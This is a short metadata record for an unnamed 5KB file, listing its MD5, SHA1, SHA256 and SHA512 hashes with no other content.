Filesize5KB
MD53f87d04f3ba551fd9a3473bb87853164
SHA1affb3fa4e198c067f7bf8cbeae5d67c1a659f17c
SHA25685196e5f7df5d6887939d36eed590ad9b6cd7936f60abdd8bfa97b83c61268d8
SHA512a42e80b5dc3997c7a4cc5cec5e97a58f1ed929a6357c707e337ec3f9f1b981f0c29480bc26280cee57a9e9bed41cee3c09c862d2cc7a53460ed0703d5fc4bed6